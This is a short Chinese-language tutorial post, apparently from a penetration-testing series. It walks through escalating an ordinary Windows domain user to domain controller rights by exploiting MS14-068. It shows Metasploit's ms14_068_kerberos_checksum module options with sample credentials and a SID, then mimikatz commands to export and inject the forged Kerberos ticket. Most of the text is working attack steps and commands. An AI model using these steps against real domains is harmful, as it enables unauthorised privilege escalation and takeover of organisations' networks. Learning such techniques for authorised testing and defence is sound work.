Bootstrap

metasploit内网篇之域普通用户提权到域控权限(十五)

在win2008里可以使 MS 14-086 exp模块对域普通用户进行提取

sf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show options 
Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
   Name     Current Setting                                 Required 
Description
   ----     ---------------                                 -------- ----------
-
 DOMAIN   moonhack.com                                   yes       The Domain 
(upper case) Ex: DEMO.LOCAL
   PASSWORD 123456                                         yes       The Domain 
User password
   RHOSTS   08server-ad.moonsec.com                                   yes       
The target host(s), range CIDR identifier, or hosts file with syntax 'file:
<path>'
   RPORT     88                                             yes       The target 
port
   Timeout   10                                             yes       The TCP 
timeout to establish connection and read data
   USER     test                                           yes       The Domain 
User
   USER_SID S-1-5-21-3439616436-2844000184-3841763578-1105 yes       The Domain 
User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

执行后会在msf路面生成bin文件由于msf里的kiwi模块不能直接进行导入,所以还需要mimikatz进行转 换

mimikatz对bin文件进行转换

kerberos::clist 
"20211205004239_default_192.168.0.133_windows.kerberos_557337.bin" /export

使用kiwi模块进行票据注入但是导入的时候失败了。

可以使用mimikatz导入 bin文件

keberos::ptc 20211207002649_default_192.168.0.133_windows.kerberos_202184.bin

;